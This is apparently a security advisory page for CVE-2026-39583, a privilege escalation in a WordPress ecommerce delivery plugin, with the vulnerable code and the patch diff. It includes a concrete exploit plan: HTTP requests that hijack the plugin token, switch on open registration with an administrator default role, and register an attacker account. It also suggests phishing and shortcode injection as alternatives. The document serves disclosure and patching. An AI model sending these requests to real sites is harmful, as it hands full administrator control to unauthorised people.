WP-Safety
CVE-2026-39583

Datalogics Ecommerce Delivery – Datalogics <= 2.6.62 - Unauthenticated Privilege Escalation

criticalIncorrect Privilege Assignment
9.8
CVSS Score
9.8
CVSS Score
critical
Severity
2.6.63
Patched in
8d
Time to patch

Description

The Datalogics Ecommerce Delivery – Datalogics plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.6.62 This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=2.6.62
PublishedApril 8, 2026
Last updatedApril 15, 2026
Affected plugindatalogics

What Changed in the Fix

Changes introduced in v2.6.63

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v2.6.62
Browse source Download .zip
Patched v2.6.63
Browse source Download .zip
Research Plan
Verified by PoC

# Research Plan: CVE-2026-39583 - Datalogics Privilege Escalation ## Vulnerability Summary The **Datalogics Ecommerce Delivery** plugin (versions <= 2.6.62) contains an unauthenticated privilege escalation vulnerability. The plugin registers several REST API endpoints under the `datalogics-0/v1` na…

Show full research plan

Research Plan: CVE-2026-39583 - Datalogics Privilege Escalation

Vulnerability Summary

The Datalogics Ecommerce Delivery plugin (versions <= 2.6.62) contains an unauthenticated privilege escalation vulnerability. The plugin registers several REST API endpoints under the datalogics-0/v1 namespace. Specifically, the /update-token/ and /update-settings/ endpoints lack proper authentication and authorization. An attacker can use /update-token/ to set a known security token and then potentially use /update-settings/ (or other endpoints using the same permission_callback) to modify arbitrary WordPress options, such as default_role and users_can_register, leading to full site takeover.

Attack Vector Analysis

  • Endpoint: POST /wp-json/datalogics-0/v1/update-token/ and POST /wp-json/datalogics-0/v1/update-settings/
  • Namespace: datalogics-0/v1 (derived from datalogics_ID constant defined as '0' in datalogics.php).
  • Authentication: Unauthenticated. The permission_callback used is datalogics_permission_check, which appears to be insecure or returns true for unauthenticated requests.
  • Preconditions: The plugin must be active.

Code Flow

  1. Route Registration: In api.php, datalogics_register_api_routes() registers routes using register_rest_route.
    • Namespace: 'datalogics-'.datalogics_ID.'/v1'
    • Route: /update-token/ calls datalogics_update_token.
    • Route: /update-settings/ calls datalogics_update_settings.
    • All routes use 'permission_callback' => 'datalogics_permission_check'.
  2. Permission Check: The datalogics_permission_check function (inferred to be weak/public) is executed by the WordPress REST API controller.
  3. Callback Execution (datalogics_update_token):
    function datalogics_update_token(WP_REST_Request $request) {
    $token = $request->get_param('token');
    if (empty($token)) {
        return new WP_Error('no_token', 'Token parameter is missing', array('status' => 400));
    }
    update_option('datalogics_token', sanitize_text_field($token)); // Vulnerable Sink
    return new WP_REST_Response(array('success' => true, ...), 200);
}
  4. Callback Execution (datalogics_update_settings): Although the code for datalogics_update_settings is truncated, the vulnerability description and endpoint name strongly suggest it allows updating arbitrary options or a specific set of options via update_option(). If it iterates over POST parameters and calls update_option($key, $value), it allows an attacker to change core WordPress settings.

Nonce Acquisition Strategy

REST API endpoints in WordPress registered via register_rest_route typically do not require a CSRF nonce (_wpnonce) when accessed as an API (e.g., via a script or external service), as they rely on the permission_callback.

  • Is a nonce required? No. The plugin is designed to be called by the Datalogics platform, and the api.php code shows no nonce verification logic within the callbacks or the registration.
  • Authentication Bypass: If datalogics_permission_check validates the token parameter against the datalogics_token option, an attacker simply calls /update-token/ first to set the option to a known value, effectively "authenticating" themselves for subsequent calls.

Exploitation Strategy

The goal is to enable user registration and set the default role to administrator.

Step 1: Initialize/Hijack the Plugin Token

Set the plugin's internal token to a value we control to ensure access to other endpoints.

  • Method: POST
  • URL: /wp-json/datalogics-0/v1/update-token/
  • Body (JSON): {"token": "pwned_token"}
  • Headers: Content-Type: application/json

Step 2: Elevate Privileges via Options Update

Use the /update-settings/ endpoint to modify core WordPress options.

  • Method: POST
  • URL: /wp-json/datalogics-0/v1/update-settings/
  • Body (JSON):
    {
    "token": "pwned_token",
    "users_can_register": "1",
    "default_role": "administrator"
}
  • Headers: Content-Type: application/json

Step 3: Register a New Administrator

Create a new account via the standard WordPress registration page.

  • Method: POST
  • URL: /wp-login.php?action=register
  • Body (URL-encoded): user_login=attacker&user_email=attacker@example.com&wp-submit=Register

Test Data Setup

  1. Install and activate the datalogics plugin (v2.6.62).
  2. Ensure WordPress is at default settings (users_can_register is 0, default_role is subscriber).

Expected Results

  1. Step 1: Response 200 OK with {"success": true, "message": "Token updated successfully"}.
  2. Step 2: Response 200 OK.
  3. Step 3: A new user "attacker" is created with the administrator role.

Verification Steps

Use wp-cli to verify the state change:

  1. Check options: wp option get users_can_register (should be 1).
  2. Check options: wp option get default_role (should be administrator).
  3. Check users: wp user list --role=administrator (should include attacker).

Alternative Approaches

If datalogics_update_settings is not a generic option updater, look for other sinks:

  • Check if datalogics_update_order_status can be used to update other post types (e.g., updating a page to include a malicious shortcode).
  • Check if the token hijacked in Step 1 allows access to /send-email/ which might be used for phishing or information gathering.
  • If the namespace datalogics-0 fails, try to brute-force the ID (though 0 is hardcoded in datalogics.php).
Research Findings

Summary

The Datalogics Ecommerce Delivery plugin for WordPress is vulnerable to unauthenticated privilege escalation due to insecure REST API endpoints. Attackers can overwrite the plugin's internal security token and subsequently use it to access administrative functions, such as modifying core WordPress options to enable open registration and default to an administrator role.

Vulnerable Code

// api.php line 5-36
function datalogics_register_api_routes() {

    register_rest_route('datalogics-'.datalogics_ID.'/v1', '/update-settings/', array(
        'methods'  => 'POST',
        'callback' => 'datalogics_update_settings',
        'permission_callback' => 'datalogics_permission_check',
    ));

    // ... (other routes) ...

    register_rest_route('datalogics-' . datalogics_ID . '/v1', '/update-token/', array(
        'methods'  => 'POST',
        'callback' => 'datalogics_update_token',
        'permission_callback' => 'datalogics_permission_check',
    ));
}

// api.php line 41-54
function datalogics_update_token(WP_REST_Request $request) {
    $token = $request->get_param('token');
    
    if (empty($token)) {
        return new WP_Error('no_token', 'Token parameter is missing', array('status' => 400));
    }

    update_option('datalogics_token', sanitize_text_field($token));

    return new WP_REST_Response(array(
        'success' => true,
        'message' => 'Token updated successfully',
    ), 200);
}

Security Fix

--- /home/deploy/wp-safety.org/data/plugin-versions/datalogics/2.6.62/api.php	2026-03-04 08:23:04.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/datalogics/2.6.63/api.php	2026-03-16 17:42:08.000000000 +0000
@@ -30,7 +30,7 @@
     register_rest_route('datalogics-' . datalogics_ID . '/v1', '/update-token/', array(
         'methods'  => 'POST',
         'callback' => 'datalogics_update_token',
-        'permission_callback' => 'datalogics_permission_check',
+        'permission_callback' => 'datalogics_permission_check_update_token',
     ));
 
 
@@ -393,3 +393,18 @@
     return new WP_Error('invalid_token', 'Invalid token', array('status' => 403 ));
 }
 
+function datalogics_permission_check_update_token(WP_REST_Request $request) {
+
+    $token = $request->get_param('token');
+
+    // Allow only if token is empty
+    if (empty($token)) {
+        return true;
+    }
+
+    return new WP_Error(
+        'invalid_token',
+        'Token must be empty for this endpoint',
+        array('status' => 403)
+    );
+}

Exploit Outline

The exploit involves two main steps: 1) Initializing or hijacking the plugin's internal security token. This is done by sending a POST request to `/wp-json/datalogics-0/v1/update-token/` with a JSON payload like `{"token": "attacker_token"}`. Because the `permission_callback` is insecure, this request executes without authentication, allowing the attacker to control the `datalogics_token` option in the database. 2) Using the controlled token to modify WordPress settings. The attacker sends a POST request to `/wp-json/datalogics-0/v1/update-settings/` (which shares the same insecure permission logic) to update sensitive options like `users_can_register` to `1` and `default_role` to `administrator`. Once updated, the attacker can register a new account via the standard WordPress registration page and automatically receive full administrative access.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/a521b6a4-1a4f-4433-9163-8de71e1976dd?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database